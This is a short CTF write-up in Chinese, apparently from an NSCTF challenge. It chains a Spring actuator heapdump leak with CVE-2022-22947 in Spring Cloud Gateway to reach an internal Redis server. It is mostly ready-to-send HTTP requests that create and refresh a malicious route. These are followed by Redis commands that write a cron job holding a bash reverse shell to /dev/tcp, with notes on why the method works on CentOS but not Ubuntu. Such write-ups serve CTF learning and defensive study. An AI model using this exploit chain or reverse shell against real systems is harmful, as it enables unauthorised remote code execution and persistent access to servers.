考点:
1、spring 敏感文件泄露
2、Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947)
3、redis反弹shell
解题:
首先是heapdump泄露,读redis key得到
然后利用 Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947) 打redis就可以了
POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 3b5744e1e70597c3.node.nsctf.cn
Connection: close
Content-Type: application/json
{
"predicates": [
{
"name": "Path",
"args": {
"_genkey_0": "/new_route/**"
}
}
],
"filters": [
{
"name": "RewritePath",
"args": {
"_genkey_0": "/new_route(?<path>.*)",
"_genkey_1": "/${path}"
}
}
],
"uri": "http://127.0.0.1:6379/",
"order": 0
}
POST /actuator/gateway/refresh HTTP/1.1
Host: 3b5744e1e70597c3.node.nsctf.cn
Connection: close
Content-Type: application/json
{
"predicate": "Paths: [/new_route], match trailing slash: true",
"route_id": "new_route",
"filters": [
"[[RewritePath /new_route(?<path>.*) = /${path}], order = 1]"
],
"uri": "https://www.cnpanda.net",
"order": 0
}
POST /new_route/xxx.xxx HTTP/1.1
Host: 3b5744e1e70597c3.node.nsctf.cn
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
auth P@ssw0rd
set xx "\n* * * * * bash -i >& /dev/tcp/vps/port 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
注意任务计划反弹shell方法仅适用于Centos
Ubuntu 不能用的原因如下:
因为默认 redis 写文件后是 644 权限,但是 Ubuntu 要求执行定时任务文件 /var/spool/cron/crontabs/<username> 权限必须是 600 才会执行,否则会报错 (root) INSECURE MODE (mode 0600 expected),而 Centos 的定时任务文件 /var/spool/cron/<username> 权限 644 也可以执行
因为 redis 保存 RDB 会存在乱码,在 Ubuntu 上会报错,而在 Centos 上不会报错
由于系统的不同,crontrab 定时文件位置也不同:
Centos 的定时任务文件在 /var/spool/cron/<username>
Ubuntu 的定时任务文件在 /var/spool/cron/crontabs/<username>